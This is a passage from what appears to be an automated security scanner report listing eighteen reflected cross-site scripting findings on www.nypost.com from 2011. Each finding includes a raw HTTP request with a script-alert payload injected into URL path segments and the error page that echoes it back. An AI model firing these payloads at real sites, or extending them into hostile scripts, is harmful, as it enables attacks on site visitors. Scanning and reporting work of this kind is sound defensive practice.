1.276. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/search/search.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83f39<script>alert(1)</script>cb4fcf8098 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal83f39<script>alert(1)</script>cb4fcf8098/nypost/blocks/search/search.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal83f39<script>alert(1)</script>cb4fcf8098/nypost/blocks/search/search.css</p>
...[SNIP]...

1.277. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/search/search.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/search/search.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52688<script>alert(1)</script>9498de8da06 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost52688<script>alert(1)</script>9498de8da06/blocks/search/search.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:12 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost52688<script>alert(1)</script>9498de8da06/blocks/search/search.css</p>
...[SNIP]...

1.278. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/search/search.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/search/search.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aacdb<script>alert(1)</script>7f534f15914 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksaacdb<script>alert(1)</script>7f534f15914/search/search.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:16 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksaacdb<script>alert(1)</script>7f534f15914/search/search.css</p>
...[SNIP]...

1.279. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/search/search.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/search/search.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8f1af<script>alert(1)</script>2917460467d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/search8f1af<script>alert(1)</script>2917460467d/search.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:17 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/search8f1af<script>alert(1)</script>2917460467d/search.css</p>
...[SNIP]...

1.280. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/search/search.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/search/search.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3f7d1<script>alert(1)</script>b14a41f6761 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/search/search.css3f7d1<script>alert(1)</script>b14a41f6761 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:20 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/search/search.css3f7d1<script>alert(1)</script>b14a41f6761</p>
...[SNIP]...

1.281. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d6465<script>alert(1)</script>fb99723ff6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigd6465<script>alert(1)</script>fb99723ff6d/WebPortal/nypost/blocks/section_blocks/section_blocks.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 733
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:34 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigd6465<script>alert(1)</script>fb99723ff6d/WebPortal/nypost/blocks/section_blocks/section_blocks.css</p>
...[SNIP]...

1.282. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c8cdd<script>alert(1)</script>0798cccf20c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortalc8cdd<script>alert(1)</script>0798cccf20c/nypost/blocks/section_blocks/section_blocks.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 733
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:36 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalc8cdd<script>alert(1)</script>0798cccf20c/nypost/blocks/section_blocks/section_blocks.css</p>
...[SNIP]...

1.283. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6b141<script>alert(1)</script>e36e8af94b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost6b141<script>alert(1)</script>e36e8af94b0/blocks/section_blocks/section_blocks.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 733
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:38 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost6b141<script>alert(1)</script>e36e8af94b0/blocks/section_blocks/section_blocks.css</p>
...[SNIP]...

1.284. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a26b2<script>alert(1)</script>17224f47620 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksa26b2<script>alert(1)</script>17224f47620/section_blocks/section_blocks.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 733
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksa26b2<script>alert(1)</script>17224f47620/section_blocks/section_blocks.css</p>
...[SNIP]...

1.285. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b0fdd<script>alert(1)</script>789b66baff3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/section_blocksb0fdd<script>alert(1)</script>789b66baff3/section_blocks.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 733
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/section_blocksb0fdd<script>alert(1)</script>789b66baff3/section_blocks.css</p>
...[SNIP]...

1.286. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d95d8<script>alert(1)</script>f4b367da8cf was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.cssd95d8<script>alert(1)</script>f4b367da8cf HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 733
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:43 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.cssd95d8<script>alert(1)</script>f4b367da8cf</p>
...[SNIP]...

1.287. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aae1f<script>alert(1)</script>786b9845610 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigaae1f<script>alert(1)</script>786b9845610/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigaae1f<script>alert(1)</script>786b9845610/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css</p>
...[SNIP]...

1.288. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4e862<script>alert(1)</script>7eb9fd2f95b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal4e862<script>alert(1)</script>7eb9fd2f95b/nypost/blocks/sticky_notes/sticky_notes.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:03 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal4e862<script>alert(1)</script>7eb9fd2f95b/nypost/blocks/sticky_notes/sticky_notes.css</p>
...[SNIP]...

1.289. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f24a<script>alert(1)</script>e275c84e434 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost8f24a<script>alert(1)</script>e275c84e434/blocks/sticky_notes/sticky_notes.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:04 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost8f24a<script>alert(1)</script>e275c84e434/blocks/sticky_notes/sticky_notes.css</p>
...[SNIP]...

1.290. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 59d1b<script>alert(1)</script>27edeb9cd02 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks59d1b<script>alert(1)</script>27edeb9cd02/sticky_notes/sticky_notes.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks59d1b<script>alert(1)</script>27edeb9cd02/sticky_notes/sticky_notes.css</p>
...[SNIP]...

1.291. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c24a5<script>alert(1)</script>54ee03b1f0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notesc24a5<script>alert(1)</script>54ee03b1f0/sticky_notes.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 728
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/sticky_notesc24a5<script>alert(1)</script>54ee03b1f0/sticky_notes.css</p>
...[SNIP]...

1.292. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 64bc3<script>alert(1)</script>6c9fbe3316d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css64bc3<script>alert(1)</script>6c9fbe3316d HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css64bc3<script>alert(1)</script>6c9fbe3316d</p>
...[SNIP]...

1.293. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36be6<script>alert(1)</script>c1bfb51766b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig36be6<script>alert(1)</script>c1bfb51766b/WebPortal/nypost/blocks/story_lists/story_lists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig36be6<script>alert(1)</script>c1bfb51766b/WebPortal/nypost/blocks/story_lists/story_lists.css</p>
...[SNIP]...

